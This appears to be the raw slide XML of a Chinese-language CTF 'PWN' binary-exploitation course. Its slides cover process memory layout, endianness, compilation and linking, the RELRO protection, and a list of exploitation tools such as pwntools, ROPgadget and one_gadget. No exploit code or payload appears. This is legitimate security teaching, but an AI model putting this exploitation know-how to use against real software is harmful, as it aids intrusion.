                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="33" name="Shape 750">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CB517B1-5875-40F8-88B9-1FDAECF47516}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="26" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1761175"/>
                <a:ext cx="0" cy="367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34" name="Shape 751">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED8E43AF-266F-4456-A067-2ADA36DE75B3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="29" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="5579150" y="2823868"/>
                <a:ext cx="0" cy="334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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Shape 746">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3078131-2CDB-4D7E-98CE-F3EF1CAF2874}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6503924" y="4832505"/>
              <a:ext cx="4790847" cy="4339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zh-CN" dirty="0" err="1"/>
                <a:t>Bss</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
                <a:t>glb</a:t>
              </a:r>
              <a:endParaRPr dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="矩形 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9B18F75-E807-43D6-9183-87010CB993F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5537759" y="4383289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载入内存</a:t>
            </a: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00F050D3-17AC-41CE-9071-1C4184676A8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987376" y="1044488"/>
            <a:ext cx="44935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程序数据是如何在内存中组织的</a:t>
            </a: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390AA778-64F1-4CDA-9651-D9CB7A278E7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| 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进程虚拟地址空间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63917980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64D43EEB-4C07-462C-88E5-884E754BC0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2608162" y="2209961"/>
            <a:ext cx="606127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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>RELRO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RELocate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Read-Only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>)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5F97E162-B4E9-4A13-B493-BAD369BE022B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2700270" y="3146640"/>
            <a:ext cx="679145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24292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程序的防护措施，编译时生效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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24292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部分 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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RELRO: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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在程序装入后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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将其中一些段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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.dynamic)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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标记为只读</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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防止程序的一些重定位信息被修改</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E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24292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完全 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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RELRO: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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在部分 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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RELRO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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的基础上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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在程序装入时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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直接解析完所有符号并填入对应的值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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此时所有的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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GOT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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表项都已初始化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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且不装入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292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link_map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="24292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dl_runtime_resolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292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的地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:effectLst/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D6ECD6E-B0BC-4364-ADCF-50984C021417}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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内存保护措施 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RELRO</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3843141180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78C03585-494F-4FC7-8D36-567CF06A54C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="964962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7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ex2  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7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PWN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7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7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Tools</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7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CB0A884-696A-4DC1-B605-06733C741227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2317667" y="2354677"/>
            <a:ext cx="7730836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IDA Pro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32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pwntools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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32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pwndbg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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32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checksec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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32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ROPgadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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32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one_gadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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32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LibcSearcher</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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32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main_arena_offset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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80828393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B99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="176683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>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IDA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Pro</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0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55614000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B99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="199285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 err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="020105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27293399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B99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="154080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 err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>pwn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>dbg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0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92800989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B99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="199285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 err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>sec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0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65673065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B99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="221887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 err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0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48307419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B99C0FC5-3BFD-44FE-B3E7-74F9F6C8329A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196641" y="79593"/>
            <a:ext cx="244490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 err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>One_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000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987493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文本框 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00F050D3-17AC-41CE-9071-1C4184676A8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987376" y="1044488"/>
            <a:ext cx="23759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大端序与小端序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722D5597-3522-4BF8-9AA0-52EB644128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0717" y="1886272"/>
            <a:ext cx="2667000" cy="238125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8B10552D-2956-4418-B093-D93BFC6ABE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7687" y="1886272"/>
            <a:ext cx="2667000" cy="2381250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96DEF0F-C629-4815-9C44-CA69CBEF1475}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1296460" y="4267522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小端序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2FE6B6E5-7EBA-4C0B-B278-B44C0A40A939}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7376719" y="4267521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大端序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3AAC8EA4-2BF3-43AD-8396-6B65B94A7119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292361" y="4729186"/>
            <a:ext cx="35188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低地址存放数据低位、高地址存放数据高位</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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我们所主要关注的格式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9FBBA69C-C3BB-481B-BA6B-689E87EC6935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7376719" y="4729186"/>
            <a:ext cx="35188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低地址存放数据高位、高地址存放数据低位</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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D104C273-E426-402A-B86D-C75E3EEBD6E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="56388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二进制基础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| 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程序的编译与链接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897038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6B020ADE-8E79-46B2-805C-C988FB5F7C11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="687528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7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7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PWN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7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？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4D326CA-BB67-4685-8B5E-C8156872EC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3755502" y="3293396"/>
            <a:ext cx="428612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概述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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一次简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12781623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35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E20A92B-5D8C-4822-88F2-F312F8FBED61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918003" y="1505118"/>
            <a:ext cx="3585985" cy="1961451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FCE5C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cpu</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 137">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73369065-BE11-4285-9A3F-E213DFE42E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608388" y="1801754"/>
            <a:ext cx="1251477" cy="506314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Register</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 138">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25186C3C-10AD-4429-81C8-DDDCECA621ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608388" y="2548879"/>
            <a:ext cx="1251477" cy="650566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Condition Codes</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 139">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0B85644-AC0E-4720-90B0-D834111BA471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2193370" y="2116354"/>
            <a:ext cx="1251477" cy="654846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Program Counter</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 140">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{882AA08E-A0A6-4CB5-B5AD-902A38DD11D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7805715" y="1674969"/>
            <a:ext cx="2010229" cy="161498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Memory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Code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Stack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
